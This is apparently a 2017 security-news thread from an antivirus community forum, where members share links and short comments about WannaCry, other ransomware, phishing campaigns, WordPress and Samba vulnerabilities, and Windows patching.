https://community.webroot.com/t5/Announcements/W32-Trojan-Gen-False-Positive-Fix-April-24/td-p/290198
It has happened to ALL AVs. It happens to Operating Systems etc.
It's especially nasty if it happens and you aren't prepared for this type of disaster.
Back up, Back up, Back up. :)
-
Cybercriminals use anti-virus exclusion lists to send malware where it may hurt most:
https://www.theregister.co.uk/2016/12/07/clever_crims_using_av_exclusion_lists_as_malware_safe_harbour/
APT attackers are better funded and conduct a lot of research before they launch attacks.
Be vigilant, folks.
polonus
-
Cybercriminals use anti-virus exclusion lists to send malware where it may hurt most:
https://www.theregister.co.uk/2016/12/07/clever_crims_using_av_exclusion_lists_as_malware_safe_harbour/
APT attackers are better funded and conduct a lot of research before they launch attacks.
Be vigilant, folks.
polonus
Hi Pol, a bit old (check the date), any reason to repost it..!?
-
Hi Asyn,
Probably a recent link at the Reg linking through to this. Meaning actually that it is still very actual news.
That is all I can think of as I did not search for 2016 content actually.
Damian
-
Close to 9,000 servers across Asean infected with malware
http://www.zdnet.com/article/close-to-9000-servers-across-asean-infected-with-malware/
-
Ongoing Cloud-Insecurity!
Spamhaus: Amazon and Google condone abuse.
Big CDNs leave malware botherder abuse going on for weeks on end, before starting to act against them.
Another sign of the dysfunctional insecurity of the global Internet Infrastructures.
And yup folks, something is fundamentally insecure, maybe by design of vested interest.
( Italics = this is my personal opinion based on over 15 years of website insecurity scanning experience, polonus).
Read: https://www.spamhaus.org/news/article/736/botnet-controllers-in-the-cloud
polonus
-
Many Android Apps backdooring your Smartphone:
Read: https://www.wired.com/2017/04/obscure-app-flaw-creates-backdoors-millions-smartphones/
By essentially turning a phone into a server, they allow the owner to connect to that phone directly from their PC, just as they would to a web site or another internet service. But dozens of these apps leave open insecure ports on those smartphones. That could allow attackers to steal data, including contacts or photos, or even to install malware.
The world around you getting more dangerous every day, open ports on Androids where you do not expect it.
Can we be protected by Avast Mobile Security?
Only would be right when I gave you this link: http://www.yougetsignal.com/tools/open-ports/ (credits Kirk Ouimet)
pol
-
OSX Malware is Catching Up, and it wants to Read Your HTTPS Traffic
http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/
-
Diving into the darknet
https://blog.avast.com/diving-into-the-darknet
Is my microwave watching me? Top 5 steps to ensure it's not
https://blog.avast.com/microwave-watching-me-internet-things-security-top-steps-connected-safety
-
Antivirus Software Fails Basic Security Tests
http://www.tomsguide.com/us/antivirus-suites-vulnerable-exploits,news-25006.html
-
Google Phishing Attack: Gmail users hit by Massive Email Scam Sweeping Web
http://www.independent.co.uk/life-style/gadgets-and-tech/google-phishing-emails-attack-gmail-scam-link-doc-invitation-hack-a7716581.html
-
Google Phishing Attack: Gmail users hit by Massive Email Scam Sweeping Web
http://www.independent.co.uk/life-style/gadgets-and-tech/google-phishing-emails-attack-gmail-scam-link-doc-invitation-hack-a7716581.html
An email with that sender's email address was automatically put into my spam folder yesterday.
I need to check the spam folder since I quite often receive emails from people not on my contact list.
However checking what's in the spam folder and opening emails from unknown people are two different things.
For me, a lot of research goes into opening anything that's in the spam folder and this email certainly didn't live up to the requirements I've set to open something in the spam folder.
-
Cerber Version 6 Shows How Far the Ransomware Has Come (and How Far it’ll Go)
http://blog.trendmicro.com/trendlabs-security-intelligence/cerber-ransomware-evolution/
-
Google Phishing Attack: Gmail users hit by Massive Email Scam Sweeping Web
http://www.independent.co.uk/life-style/gadgets-and-tech/google-phishing-emails-attack-gmail-scam-link-doc-invitation-hack-a7716581.html
An email with that sender's email address was automatically put into my spam folder yesterday.
I need to check the spam folder since I quite often receive emails from people not on my contact list.
However checking what's in the spam folder and opening emails from unknown people are two different things.
For me, a lot of research goes into opening anything that's in the spam folder and this email certainly didn't live up to the requirements I've set to open something in the spam folder.
If you did fall for this, you can reverse it. Here's how: https://lifehacker.com/how-to-secure-your-online-accounts-by-revoking-access-f-1794631133
-
Google Phishing Attack: Gmail users hit by Massive Email Scam Sweeping Web
http://www.independent.co.uk/life-style/gadgets-and-tech/google-phishing-emails-attack-gmail-scam-link-doc-invitation-hack-a7716581.html
An email with that sender's email address was automatically put into my spam folder yesterday.
I need to check the spam folder since I quite often receive emails from people not on my contact list.
However checking what's in the spam folder and opening emails from unknown people are two different things.
For me, a lot of research goes into opening anything that's in the spam folder and this email certainly didn't live up to the requirements I've set to open something in the spam folder.
If you did fall for this, you can reverse it. Here's how: https://lifehacker.com/how-to-secure-your-online-accounts-by-revoking-access-f-1794631133
I didn't get this email at all and I didn't fall for this. I am always cautious of who and what comes in my mail. If it's from an unknown sender it automatically goes in my spam folder. Thanks for the link.
-
Windows backdoor malware disguises itself as Adobe Flash on macOS
https://9to5mac.com/2017/05/05/windows-backdoor-malware-disguises-itself-as-adobe-flash-on-macos/
-
Windows backdoor malware disguises itself as Adobe Flash on macOS
https://9to5mac.com/2017/05/05/windows-backdoor-malware-disguises-itself-as-adobe-flash-on-macos/
Does that mean there is more than one way to skin a Mac? :)
-
Mozilla: Future of a secure Internet Infrastructure at stake :
https://blog.mozilla.org/blog/2017/05/08/next-10-days-critical-internets-future/
The gutting of Internet's privacy in return for quite some lobbying sums:
https://www.fightforthefuture.org/news/2017-05-03-crowdfunded-billboards-appear-in-districts-of/
It is not developing into the right direction for end-user security, folks. :D
It could not have been better boom times for elitist globalists however. ;D
polonus
-
Mozilla: Future of a secure Internet Infrastructure at stake :
https://blog.mozilla.org/blog/2017/05/08/next-10-days-critical-internets-future/
The gutting of Internet's privacy in return for quite some lobbying sums:
https://www.fightforthefuture.org/news/2017-05-03-crowdfunded-billboards-appear-in-districts-of/
It is not developing into the right direction for end-user security, folks. :D
It could not have been better boom times for elitist globalists however. ;D
polonus
One of my favorite quotations:
"It's all about the money, honey."
-
Mirror Download Server Compromised [HandBrake for Mac]
https://forum.handbrake.fr/viewtopic.php?f=33&t=36364
-
https://tinyurl.com/l2426m6
Security flaw fix that is affecting all MS anti-malware software.
-
https://tinyurl.com/l2426m6
Security flaw fix that is affecting all MS anti-malware software.
If you don't like tinyurl,
https://technet.microsoft.com/en-us/library/security/4022344?ranMID=24542&ranEAID=TnL5HPStwNw&ranSiteID=TnL5HPStwNw-KdKC9eqcynmEu7ABclMOdQ&tduid=(ef8a4b93983af995464847ef51f0dec5)(256380)(2459594)(TnL5HPStwNw-KdKC9eqcynmEu7ABclMOdQ)()
-
Microsoft releases emergency patch for 'crazy bad' Windows zero-day bug
http://www.zdnet.com/article/microsoft-releases-emergency-patch-for-crazy-bad-windows-zero-day-bug/?loc=newsletter_small_thumb&ftag=TRE17cfd61&bhid=25195719670286873442005331614361
-
Posting about the enormous insecurity of a majority of WordPress sites for years now,
and finally I feel I am right: https://www.wordfence.com/blog/2017/05/22-abandoned-wordpress-plugins-vulnerabilities/
polonus (volunteer website security analyst and website error-hunter)
-
Change your Whatsapp settings, else all your private data are out in the street:
Read: https://www.allaboutphones.nl/whatsapp-privacy-hackers/
and play and discover: https://github.com/tgalal/yowsup
Facebook's reaction: they know about the insecurity features and it does not really bother them....
and then it does bother some and then they choose signal over Whatsapp.
polonus
-
Keylogger in audio driver from HP.
https://www.modzero.ch/modlog/archives/2017/05/11/en_keylogger_in_hewlett-packard_audio_driver/index.html
-
Read: https://www.theregister.co.uk/2017/05/12/googles_php_api_client_has_xss_vulnerability/
XSS vulnerabilities still unpatched in Google API code, read: https://markjaquith.wordpress.com/2009/09/21/php-server-vars-not-safe-in-forms-or-links/
polonus (volunteer website security analyst and website error-hunter)
-
WCry: Knowns And Unknowns
https://labsblog.f-secure.com/2017/05/13/wcry-knowns-and-unknowns/
Massive WannaCry/Wcry Ransomware Attack Hits Various Countries
http://blog.trendmicro.com/trendlabs-security-intelligence/massive-wannacrywcry-ransomware-attack-hits-various-countries/
WanaCrypt0r ransomware hits it big just before the weekend
https://blog.malwarebytes.com/cybercrime/2017/05/wanacrypt0r-ransomware-hits-it-big-just-before-the-weekend/
The worm that spreads WanaCrypt0r
https://blog.malwarebytes.com/threat-analysis/2017/05/the-worm-that-spreads-wanacrypt0r/
Symantec
https://www.symantec.com/connect/blogs/what-you-need-know-about-wannacry-ransomware
How is WannaCry spread?
While WannaCry can spread itself across an organization’s networks by exploiting a vulnerability, the initial means of infection—how the first computer in an organization is infected—remains unconfirmed. Symantec has seen some cases of WannaCry being hosted on malicious websites, but these appear to be copycat attacks, unrelated to the original attacks.
-
WannaCry
https://www.engadget.com/2017/05/15/pirated-windows-china-russia-wannacry/
https://www.engadget.com/2017/05/15/wannacry-ransomware-may-have-had-north-korean-code/
https://www.engadget.com/2017/05/14/wannacry-ransomware-evolves/
-
http://bob3160.blogspot.com/2017/05/wannacry-ransomeware-live-dont-get.html
-
WannaCry & The Reality Of Patching
http://blog.trendmicro.com/wannacry-reality-of-patching/
Why “Just Patch It!” Isn’t as Easy as You Think
http://blog.trendmicro.com/just-patch-isnt-easy-think/
-
PHISHING 33% up because of Brexit: https://www.theregister.co.uk/2017/02/07/phishing_trends/
pol
-
PHISHING 33% up because of Brexit: https://www.theregister.co.uk/2017/02/07/phishing_trends/
pol
Sounds like politics to me. :)
-
PHISHING 33% up because of Brexit: https://www.theregister.co.uk/2017/02/07/phishing_trends/
pol
I have seen lots of things being blamed on Brexit, but this is bloody ridiculous.
The Brexit vote was almost a year ago and almost anything malware related is going to go up year on year, crazy.
-
PHISHING 33% up because of Brexit: https://www.theregister.co.uk/2017/02/07/phishing_trends/
pol
Sounds like politics to me. :)
Political Phish you mean. ;D
-
PHISHING 33% up because of Brexit: https://www.theregister.co.uk/2017/02/07/phishing_trends/
pol
I have seen lots of things being blamed on Brexit, but this is bloody ridiculous.
The Brexit vote was almost a year ago and almost anything malware related is going to go up year on year, crazy.
Brexit and Trump, the blame for everything that's wrong in this world.
If you don't believe me just read the newspaper or look at the news. :)
-
PHISHING 33% up because of Brexit: https://www.theregister.co.uk/2017/02/07/phishing_trends/
pol
Sounds like politics to me. :)
Political Phish you mean. ;D
You're spelling pish wrong :D
-
Pictures say more ;D
-
BTCWare Ransomware Master Key Released, Free Decrypter Available
https://www.bleepingcomputer.com/news/security/btcware-ransomware-master-key-released-free-decrypter-available/
-
Steps for Window 10 system to set Port and prevent WannaCrypt attacking
https://goo.gl/u54N15
-
Steps for Window 10 system to set Port and prevent WannaCrypt attacking
https://goo.gl/u54N15
#
Thanks for that Bob.
-
Steps for Window 10 system to set Port and prevent WannaCrypt attacking
https://goo.gl/u54N15
#
Thanks for that Bob.
Technically, it's the UDP port that's the problem. If you see any programs not starting properly, you may want to bypass the TCP rule. :)
( I currently disabled the TCP rule on my system for that reason. )
-
Steps for Window 10 system to set Port and prevent WannaCrypt attacking
https://goo.gl/u54N15
#
Thanks for that Bob.
Technically, it's the UDP port that's the problem. If you see any programs not starting properly, you may want to bypass the TCP rule. :)
( I currently disabled the TCP rule on my system for that reason. )
Wise as TCP is more commonly used and I think I recall port 445 being used by other legit functions. So some would say that port was already being exploited, so it is difficult to say what action to take.
This port has been used by other malware in the past, see https://www.speedguide.net/port.php?port=445 for more information on this.
-
Chrome on Windows with credential theft bug: https://www.theregister.co.uk/2017/05/17/chrome_on_windows_has_credential_theft_bug/
polonus
-
WannaCry Ransomware Campaign: Threat Details and Risk Management
https://www.fireeye.com/blog/products-and-services/2017/05/wannacry-ransomware-campaign.html
-
Windows 10 credential theft: Google is working on fix for Chrome flaw
http://www.zdnet.com/article/windows-10-credential-theft-google-is-working-on-fix-for-chrome-flaw/
-
Again WordPress: https://wordpress.org/news/2017/05/wordpress-4-7-5/
This CMS will always be a disaster in the hands of those that do not know what to do and how to configure WordPress properly.
Many sites are very easily being compromised that way or can be infested any minute.
Look what could be wrong with a WordPress website here: https://hackertarget.com/wordpress-security-scan/
Eddy here and little old me also often meet: old software versions, old plug-ins and vulnerable themes, outdated plug-ins or even left-behind code. User Enumeration & Directory Listing enabled, iFrame issues, cloaking, not sticking to the so-called same origin rule, none or not the right security headers generated, no SRI hashes being generated and lots of other insecurity.
So there are a lot of websites with bad CMS with vulnerable jQuery libraries. One could scan here: https://aw-snap.info/file-viewer/
Redleg alerts for many issues. I have been posting about these issues so many times now, and gave at these forums so many scanner examples in the "virus and worms" board, but I fear again it will be pearls before swine and not much improvement will be seen, and website admins and many hosters will never come to pick up "best practices". The main Internet Infrastructure is a very dangerous place, folks.
polonus
-
LetsEncrypt OCSP Fail: https://letsencrypt.status.io/
polonus
-
Spreading more rapidly than WannaCry.
https://www.wired.com/2017/05/another-ransomware-nightmare-brewing-ukraine/
-
Yep, Eddy, you are right and as can be expected there will be loads of victims still out on Win7.
Remember cybercrime has just recently been given an enormous boost from NSA's irresponsible zero-day policy,
sitting on such "feature holes" and not sharing them with those in the security community,
that may protect against abuse through other parties than these guv spooks (ordinary cybercriminals).
Why put all of the Interwebs at risk? We are gonna be in for some not so nice surprise attacks in the coming future,
and also AV is better advised to protect against 'guv malcode' if they have knowledge thereof and haven't protected us against it yet.
polonus (volunteer website security analyst and website error-hunter)
-
A new WannaCry decrypter.
https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d
-
Spreading more rapidly than WannaCry.
https://www.wired.com/2017/05/another-ransomware-nightmare-brewing-ukraine/
After reading that article I am so glad I have a solid backup plan.
-
Hi Para-Noid
A solid back-up plan is a must, but also a solid patch plan when patches are being served up.
All systems that had been patched were secure. All on non-exploitable OSes were secure.
If it has hit you, you can feel sorry for yourself.
In Ukraine loads of folks are out on not-always genuine Win7 and even XP.
There weren't that many victims in the USA where the threat was created...
only those there that did not pay attention fell victim to it.
polonus
-
Each and everyone seems after your data; the sniffers and spooks cannot be held back from sniffing around your devices.
OK, you agreed to their software EULAs, so you have nothing to say in the matter, but isn't this all going a wee bit over the top?
Remotely collecting analytical user data from Netgear routers: https://community.netgear.com/t5/Nighthawk-WiFi-Routers/R7000-quot-Router-Analytics-Data-Collection-quot-Options-Grayed/td-p/1287480
polonus
-
Jaff Ransomware Switches to the WLU Extension and Gets a New Design
https://www.bleepingcomputer.com/news/security/jaff-ransomware-switches-to-the-wlu-extension-and-gets-a-new-design/
The following is the sample of Jaff ransomware I saw on Tuesday 2017-05-23:
SHA256 hash: 557306dc8005f9f6891939b5ceceb35a82efbe11bd1dede755d513fe6b5ac835
File size: 241,664 bytes
File location: C:\Users\[username]\AppData\Local\Temp\levinsky8.exe
It is not possible to decrypt the Jaff Ransomware WLU Variant
Unfortunately, it is not possible to decrypt .wlu files encrypted by the Jaff Ransomware for free.
-
Hacked in Translation
http://blog.checkpoint.com/2017/05/23/hacked-in-translation/
-
TLD domains with most malicious activity
https://blog.domaintools.com/2017/05/the-domaintools-report-spring-2017/
-
Data-Wiping Malware Takes Aim at IoT Devices
New breeds of malware specializing in wiping data are targeting internet of things (IoT) devices in homes and businesses.
https://www.infosecurity-magazine.com/news/datawiping-malware-takes-aim-at/
-
Data-Wiping Malware Takes Aim at IoT Devices
New breeds of malware specializing in wiping data are targeting internet of things (IoT) devices in homes and businesses.
https://www.infosecurity-magazine.com/news/datawiping-malware-takes-aim-at/
Ha, that's all we need your fridge to become a freezer and your freezer to become a fridge.
Personally I can't see the point of much of the IoT, smart components and dumb users.
-
Hi DavidR,
But these devices will appear now everywhere. I have also seen them already in exam rooms hanging on the ceiling, so-called to check human presence and student noise.
All these meters and gadgets are hung onto the Internet and centrally administered; also some people that had a job in the past looking after thermostats and window blinds etc. now face being made redundant and eventually turned out onto the streets.
It is a sad thing actually when you come to think of it, especially when the jobless have more in their purses than those with moderate wages, at least in some towns where I live (in the Netherlands, where you're better off on the dole so to say), so there also is no initiative to do the IoT's job as a human being. Cleverbot is coming in outsmarting us all, and the managers behind these cyborgs bring them in.
polonus
-
Avast releases decryptor tool for BTCWare ransomware
https://blog.avast.com/avast-releases-decryptor-tool-for-btcware-ransomware
-
Cookies Are the Original Ransomware
http://in.pcmag.com/opinion/114570/cookies-are-the-original-ransomware
Thus, the first ransomware message came from advertisers and website operators:
"we are not showing you this content unless you allow us to use cookies on your computer."
-
Newly discovered vulnerability raises fears of another WannaCry (*nix and Windows systems)
http://www.reuters.com/article/us-cyber-attack-samba-idUSKBN18L0GD
-
Newly discovered vulnerability raises fears of another WannaCry (*nix and Windows systems)
http://www.reuters.com/article/us-cyber-attack-samba-idUSKBN18L0GD
US-CERT >> https://www.us-cert.gov/ncas/current-activity/2017/05/24/Samba-Releases-Security-Updates
CVE-2017-7494.html: https://www.samba.org/samba/security/CVE-2017-7494.html
-
Data-Wiping Malware Takes Aim at IoT Devices
New breeds of malware specializing in wiping data are targeting internet of things (IoT) devices in homes and businesses.
https://www.infosecurity-magazine.com/news/datawiping-malware-takes-aim-at/
Ha, that's all we need your fridge to become a freezer and your freezer to become a fridge.
Personally I can't see the point of much of the IoT, smart components and dumb users.
Very annoying when you open the door and you see 24 bottles of frozen beer ;D
-
Tech Support Scammers Are Exploiting Mass Hysteria Surrounding WannaCry
https://www.bleepingcomputer.com/news/security/tech-support-scammers-are-exploiting-mass-hysteria-surrounding-wannacry/
-
Researchers found 100.000 vulnerable Samba-systems.
Re: https://www.samba.org/samba/security/CVE-2017-7494.html
Sorry had already been posted,
polonus
-
Possibility to take over the UI and take over the device completely (Android)
Google refuses to provide a patch/fix !
http://cloak-and-dagger.org/
-
Linguistic Analysis Suggests WannaCry Ransomware Is the Work of a Chinese-Speaking Crook
https://www.bleepingcomputer.com/news/security/linguistic-analysis-suggests-wannacry-ransomware-is-the-work-of-a-chinese-speaking-crook/
-
AES-NI Ransomware Dev Releases Decryption Keys Amid Fears of Being Framed for XData Outbreak
https://www.bleepingcomputer.com/news/security/aes-ni-ransomware-dev-releases-decryption-keys-amid-fears-of-being-framed-for-xdata-outbreak/
-
Is Avast protecting us against RoughTed the anti adware blocker malvertiser?
Read: https://blog.malwarebytes.com/cybercrime/2017/05/roughted-the-anti-ad-blocker-malvertiser/
polonus
-
NTFS bug lets anyone hang or crash Windows 7, 8.1
https://arstechnica.co.uk/information-technology/2017/05/in-a-throwback-to-the-90s-ntfs-bug-lets-anyone-hang-or-crash-windows-7-8-1/
-
Hacked in Translation – from Subtitles to Complete Takeover
http://blog.checkpoint.com/2017/05/23/hacked-in-translation/
-
German Threat Actor Spreads Houdini Worm on Pastebin
https://www.infosecurity-magazine.com/news/german-threat-actor-spreads-houdini/
-
Will we browse against the machine or are we being borked by the machine?
Google blacklisting gets stricter for non-https-websites: https://blog.sucuri.net/2017/05/non-https-websites-blacklisted-for-passwords-without-ssl.html
Mozilla starts campaign against Google Chrome's Monoculture & Monopoly: https://medium.com/the-official-unofficial-firefox-blog/browse-against-the-machine-e793c0fee917
polonus
-
Will we browse against the machine or are we being borked by the machine?
Google blacklisting gets stricter for non-https-websites: https://blog.sucuri.net/2017/05/non-https-websites-blacklisted-for-passwords-without-ssl.html
Mozilla starts campaign against Google Chrome's Monoculture & Monopoly: https://medium.com/the-official-unofficial-firefox-blog/browse-against-the-machine-e793c0fee917
polonus
I learned a long time ago that knocking your enemies isn't a good way to make friends.
The cream usually rises to the top without needing to knock other things down.
If Firefox wants to get a bigger share of the market, simply become a better browser and it will attract users just like honey attracts flies. :)
-
Over 8,600 Security Flaws Found in Pacemaker Systems
https://www.bleepingcomputer.com/news/security/over-8-600-security-flaws-found-in-pacemaker-systems/
-
Microsoft Quietly Patches Another Critical Malware Protection Engine Flaw
https://threatpost.com/microsoft-quietly-patches-another-critical-malware-protection-engine-flaw/125951/
-
Honeypots for NSA SMB exploit take one attack every minute now:
Read: https://doublepulsar.com/eternalpot-lessons-from-building-a-global-nation-state-smb-exploit-honeypot-infrastructure-3f2a0b064ffe
Info credits: Kevin Beaumont
The USA and the world may have escaped from a very serious threat this time; it might have cost lives:
https://publicintelligence.net/dhs-ocia-wannacry/
Let us hope NSA learned this lesson well.
polonus
-
Anonymous Member Playing with Houdini RAT and MoWare Ransomware
https://www.bleepingcomputer.com/news/security/anonymous-member-playing-with-houdini-rat-and-moware-ransomware/
-
Chrome Bug Allows Sites to Record Audio and Video Without a Visual Indicator
https://www.bleepingcomputer.com/news/security/chrome-bug-allows-sites-to-record-audio-and-video-without-a-visual-indicator/
-
Split Tunnel SMTP Exploit Allows an Attacker to Inject Payloads Into Email Servers
https://www.bleepingcomputer.com/news/security/split-tunnel-smtp-exploit-allows-an-attacker-to-inject-payloads-into-email-servers/
-
Is the dark web safe? ... nope
Red on Red: The Attack Landscape of the Dark Web
http://blog.trendmicro.com/trendlabs-security-intelligence/red-on-red-the-attack-landscape-of-the-dark-web/
Conclusions
We didn’t think that hidden services operated within Tor would be attacked by other cyber-criminals. We were proven wrong—twice, in fact.
First, we were surprised when we learned that Tor proxies were making the Dark Web not as “dark” as some people would think. As a result, we started filtering out this traffic from our honeypots.
We thought this would prevent any further attacks, but we were mistaken. The attacks continued to take place. It turned out that cybercriminals were looking for services operated by other organizations and manually conducting attacks. Given that indexing and searching is more difficult within the Dark Web, this shows the amount of effort motivated criminals are putting into finding and disabling sites controlled by their competitors.
Apparently, there is no honor among thieves.
-
Honeypots for NSA SMB exploit take one attack every minute now:
Read: https://doublepulsar.com/eternalpot-lessons-from-building-a-global-nation-state-smb-exploit-honeypot-infrastructure-3f2a0b064ffe
Info credits: Kevin Beaumont
The USA and the world may have escaped from a very serious threat this time; it might have cost lives:
https://publicintelligence.net/dhs-ocia-wannacry/
Let us hope NSA learned this lesson well.
polonus
Quote
One thing I will say — I don’t want to name the vendors, but some of the biggest next-generation security products simply aren’t detecting SMB attacks nearly well enough. Malware regularly infects these systems, and they have to be reimaged as a result. It is amazing seeing next gen, premium tools with machine learning etc running Coin Miners and remote access trojans delivered via old exploits, with the tools not even noticing. It has been very eye opening for me. The marketing to reality Venn diagram here isn’t so Venn. At times it is so bad it is actually jaw dropping seeing certain attacks not being detected.
-
Only 4% of WordPress websites have the latest version and all patches installed:
https://securityintelligence.com/relying-on-data-to-mitigate-the-risk-of-wordpress-website-hijacking/
Check at Quttera and Sucuri's and also here: hackertarget.com/wordpress-security-scan/
Check sri hashes here: https://sritest.io/ and retirable jQuery libraries here: http://retire.insecurity.today/#
Also check here: https://observatory.mozilla.org/ for a rough and dirty scan of insecurity.
polonus (volunteer website security analyst and website error-hunter)
-
Yandex Ukraine offices came under scrutiny from SBU: https://www.theregister.co.uk/2017/05/30/yandexs_ukraine_offices_raided_for_treason/
polonus
-
Intel chip flaw allows hackers to hijack thousands of PCs
http://www.telegraph.co.uk/technology/2017/05/08/intel-chip-flaw-allows-hackers-hijack-thousands-pcs/
Dated May 8th, somehow not noted: Apparently affects commercial systems.
-
Intel chip flaw allows hackers to hijack thousands of PCs
http://www.telegraph.co.uk/technology/2017/05/08/intel-chip-flaw-allows-hackers-hijack-thousands-pcs/
Dated May 8th, somehow not noted: Apparently affects commercial systems.
Isn't it so damn typical: build a backdoor and people will take advantage of it.
EDIT: Not sure why it would only be on commercial systems. I don't believe Intel built specific chips for commerce.
-
News Brief: BitKangoroo Ransomware Deletes Your Files If You Do not Pay
https://www.bleepingcomputer.com/news/security/news-brief-bitkangoroo-ransomware-deletes-your-files-if-you-do-not-pay/
-
Not new May 8, 2017
-
Man Linked to Auto Parts Store Behind Bachosens Malware
https://www.bleepingcomputer.com/news/security/man-linked-to-auto-parts-store-behind-bachosens-malware/
-
Security Researchers Are Gathering Funds to Buy Future Shadow Brokers Exploits
https://www.bleepingcomputer.com/news/security/security-researchers-are-gathering-funds-to-buy-future-shadow-brokers-exploits/
UPDATE [June 1, 05:00 AM ET]: Due to legal concerns, the team behind this campaign has pulled out and shut down the project. Statements here and here.
-
Fireball Malware Infects 20% of Corporate Networks Worldwide
https://www.infosecurity-magazine.com/news/fireball-infects-20-of-corporate/
-
Kmart Point of Sale Hacked with 'Undetectable' Malware
https://www.infosecurity-magazine.com/news/kmart-point-of-sale-hacked/
-
More about Fireball
http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/
-
Identity Manager OneLogin Has Suffered a Nasty Looking Data Breach
https://motherboard.vice.com/en_us/article/identity-manager-onelogin-has-suffered-a-nasty-looking-data-breach
https://www.onelogin.com/blog/may-31-2017-security-incident
-
Russian State Hackers Use Britney Spears Instagram Posts to Control Malware
https://www.bleepingcomputer.com/news/security/russian-state-hackers-use-britney-spears-instagram-posts-to-control-malware/
-
Microsoft Internet Explorer Multiple Vulnerabilities
Secunia Advisory SA76672
Where: From remote
Impact: Security Bypass, Spoofing, System access
Solution Status: Vendor Patch
Software:
Microsoft Internet Explorer 10.x
Microsoft Internet Explorer 11.x
Microsoft Internet Explorer 9.x
CVE Reference(s): CVE-2017-0064, CVE-2017-0222, CVE-2017-0226, CVE-2017-0228, CVE-2017-0231, CVE-2017-0238
-
Dangerous new AMT SOL malware abused by hackers. Can avast protect us?
Read: https://blogs.technet.microsoft.com/mmpc/2017/06/07/platinum-continues-to-evolve-find-ways-to-maintain-invisibility/
There is more trouble like WannaCry in the pipeline for us all. Why supervisors do not make an effort to make the general infrastructure somewhat less holed with all those that wanna spook on the general public or abuse them, big gubberment and big commerce alike.
All small remainders of your privacy and other rights will go down the drain when this tracking and surveillance tornado is not brought to calm down. The sad thing is there seems no end to this.
polonus
-
Ransomware now available for Mac computers - http://www.myce.com/news/security-researchers-discover-ransomware-apple-computers-tor-network-82111/
Nothing new: http://blog.trendmicro.com/ransomware-is-a-growing-risk-on-macs/
-
Microsoft Patches Windows XP Again As Part of June Patch Tuesday
http://blog.trendmicro.com/trendlabs-security-intelligence/microsoft-patches-windows-xp-again-june-patch-tuesday/
-
Microsoft should seriously consider retiring Windows XP, Vista and 8.1 for good. It's costing Microsoft more money and more human resources to babysit these old Windows OSes. Business owners, educational institutions etc. should consider going to Windows 10. The institute that I go to has already implemented Windows 10 on all of the computers, and I am our neighboring country Australia has followed us. Why can't other countries follow the same thing and move to Windows 10?
This was hit just yesterday https://www.theguardian.com/technology/2017/jun/15/university-college-london-hit-by-ransomware-attack-hospitals-email-phishing
-
Microsoft should seriously consider retiring Windows XP, Vista and 8.1 for good. It's costing Microsoft more money and more human resources to babysit these old Windows OSes. Business owners, educational institutions etc. should consider going to Windows 10. The institute that I go to has already implemented Windows 10 on all of the computers, and I am our neighboring country Australia has followed us. Why can't other countries follow the same thing and move to Windows 10?
This was hit just yesterday https://www.theguardian.com/technology/2017/jun/15/university-college-london-hit-by-ransomware-attack-hospitals-email-phishing
Changing to Windows 10 still doesn't prevent the user from infecting the system.
-
Considerable Brute Force Attacks on Word Press CMS:
-https://www.wordfence.com/blog/2017/06/home-router-botnet-resumes-attacks/
Broke that link because of unsolicited adware for paid audit and subscription, if anyone wonders why I broke it.
polonus
-
Microsoft should seriously consider retiring Windows XP, Vista and 8.1 for good. It's costing Microsoft more money and more human resources to babysit these old Windows OSes. Business owners, educational institutions etc. should consider going to Windows 10. The institute that I go to has already implemented Windows 10 on all of the computers, and I am our neighboring country Australia has followed us. Why can't other countries follow the same thing and move to Windows 10?
This was hit just yesterday https://www.theguardian.com/technology/2017/jun/15/university-college-london-hit-by-ransomware-attack-hospitals-email-phishing
Changing to Windows 10 still doesn't prevent the user from infecting the system.
Yes I agree, but they will be much safer and getting security updates from Microsoft, and also it's the most up to date Windows OS. They just need to apply common sense.
-
Samsung Magician fails to update itself securely (SSD's)
http://www.kb.cert.org/vuls/id/846320
-
Windows 10 without creator's update & device guard stays vulnerable to EternalBlue & EternalRomance NSA exploits as adapted for Win 10 by Shadow-Brokers' to exploit your regular Windows 10.
Re: https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/
Why not run Windows 10 under linux in virtual box, and then have the best of both worlds, as we now should know that Windows (influenced by NSA etc.) can never really be trusted to be fully secure to specific end-users.
Patch and upgrade and you are and maybe feel more secure, but never fully secure in the surveillance state that we find ourselves to reside in to-day.
Proprietary software, well, you never know what you are up against.
Open software is open and the code can be checked, so irresponsible big gubberment forces won't sit silently on zero-days for five years at a stretch, before proliferation takes place through leaks and/or exploits are found up, and the hacks fall into the hands of cybercriminals.
polonus
-
Erebus Resurfaces as Linux Ransomware
http://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/
-
Microsoft admits it disables anti-virus software in response to Kaspersky's EU complaint
https://www.theverge.com/2017/6/20/15836208/microsoft-kaspersky-eu-anti-virus-complaint-response
-
Microsoft admits it disables anti-virus software in response to Kaspersky's EU complaint
https://www.theverge.com/2017/6/20/15836208/microsoft-kaspersky-eu-anti-virus-complaint-response
IMHO, better to disable something not compatible than allow it to run and crash the system.
-
Another chapter in Drupalgeddon: https://www.drupal.org/PSA-2014-003
Serious hole to be patched via an update.
CMS it can be a constant pain in the neck, sometimes. Drupal, Word Press etc.
polonus
-
The first thing learned by toddlers is to keep their hands out of the cookie jar.
Part of education learnt with your first visit to a big department candy store.
Never forget that for the rest of your life, part of your Kinderstube education.
Now these mechanisms often fail for spoiled young folk even when they grow older.
What you put in is being turned out. Hey, Sparta, do you hear me?
Now that society educates and you're not taught such things evidently by your parents or grandparents or whatever,
you get such news as this:
https://www.buzzfeed.com/jasonleopold/cia-vending-thefts?utm_term=.gpVkpnXNV#.qkmEbm69d
Nice to be protected by those from gubberment you cannot even trust as far as a candybar's long :o
polonus
-
Bad news and a sure cause of more Win10 insecurity coming: https://www.theregister.co.uk/2017/06/23/windows_10_leak/
General issues with Microsoft Software according to GNU's: https://www.gnu.org/proprietary/malware-microsoft.html
These are insecure days for Windows end-users.
polonus
-
TheRegister is completely wrong.
It wasn't 32 Tb but only 1,2 Gb and a lot of the code never made it into the final build.
This is where the code was uploaded :
https://www.betaarchive.com/forum/viewtopic.php?t=37283
-
Hi Eddy,
If that should be otherwise, would not you be the first to debunk it as quickly as possible?
